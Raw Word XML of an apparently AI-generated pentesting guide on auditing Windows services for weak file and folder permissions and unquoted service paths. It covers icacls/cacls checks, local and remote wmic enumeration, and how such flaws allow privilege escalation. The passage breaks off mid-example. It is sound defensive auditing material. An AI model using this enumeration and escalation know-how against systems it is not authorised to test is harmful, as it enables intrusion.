      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auditing Windows Services with a focus on Insecure File System Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">, tailored for Windows security and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F3ACA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="58494231">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF368A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Auditing Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689C4032" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Insecure File System Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57A5DD" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Windows service binaries reside on disk in directories with assigned filesystem permissions. Improperly configured permissions on either the service binary or its parent directory can lead to serious security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682F81C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="0D7D4126">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975286E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Misconfigurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9CF121" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak Permissions on Service Directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB71C7" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t>The folder containing the service executable may have overly permissive access, often inherited from parent directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA8C3A0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>For example, the "Everyone" group having full control ((F)) on the service folder allows any user to modify or replace files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B658CEC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak Permissions on Service Binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DBEB44" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>The executable itself may have weak permissions, either explicitly set or inherited from the parent directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD45A8" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>This can enable unauthorized users to overwrite the service executable and run arbitrary code in the service’s security context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC5E91E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="1938FF23">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="068CE863" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Typical Causes and Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BBD230" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-user applications</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> sometimes use the current working directory (instead of user-specific locations like %APPDATA%), requiring relaxed permissions on that directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B6C6E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Installing services directly under system root (e.g., C:\) without adjusting permissions can unintentionally give regular users write or append access, which can be exploited for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB8E80" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>cacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> show these permissions. For instance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096BCD6" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">C:\Program Files&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>TestService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51D72CCA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>TestService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Everyone:(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>OI)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>CI)(F)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE336C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>This indicates "Everyone" has full control on the folder, which is insecure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567A19B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Similarly, the service binary itself may show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AF9C51" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>TestService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> svc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C7D36" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>svc.exe Everyone:(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>I)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>F)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C336C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>The (I) shows inherited permissions, which can be dangerous if the parent folder is insecure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD6F8E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="3AA09B43">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D89B4" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auditing Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48A68B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identify Service Binary Paths:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Use the native Windows command to list all services and their executable paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029E868" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>wmic service list config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C5A351" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>Or remotely (requires admin access):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1317237C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>wmic /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>node:target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>user:username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>password:user_pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> service list config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B90357" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check Permissions:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>For each binary path, inspect both the executable file and its parent directory permissions using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C222C1" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>icacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> &lt;path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC3396" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>or (older systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A13C36E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>cacls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> &lt;path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D26CE" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prioritize Checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06907E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>System services typically reside in C:\Windows\System32, which is generally secure with read-only access for users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1FBBA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t>User-installed services commonly are in C:\Program Files or custom directories — these should be prioritized during auditing, especially those outside system folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282F31F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="3E711FFF">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5E379" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why This Matters for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4726B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Overly permissive permissions allow local attackers or users to replace or modify service binaries or DLLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37066E6E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Since services often run with elevated privileges, this can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC73999" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Historical vulnerabilities (e.g., earlier Symantec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>pcAnywhere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> versions) have exploited such misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F94892" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="14E55E7E">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6361E666" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Auditing Windows services for insecure file system permissions involves enumerating service executable paths, inspecting directory and file permissions for weak or inherited rights, and prioritizing binaries located outside protected system folders. Correct permission settings are critical to prevent attackers from hijacking services to gain elevated access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0BD55" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="3E66CDFB">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC3D66" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>If you want, I can continue with summaries of other Windows Services security auditing topics like unquoted service paths, weak registry permissions, or DLL hijacking. Would you like me to?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A2C92" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453D8AA4" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Great! Here’s a summarized and corrected continuation on </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>other common Windows Services misconfigurations and attack vectors</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> relevant for auditing and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC897F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="27C31C7C">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733B7C2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Unquoted Service Paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D7986" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t xml:space="preserve">If a service executable path contains spaces and is </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not enclosed in quotes</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t>, Windows may misinterpret it and attempt to execute a malicious file placed by an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CBE0AC" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Service binary path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76FBE7" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>C:\Program Files\My Service\service.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AAA975" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t>If stored without quotes like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833AD7F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
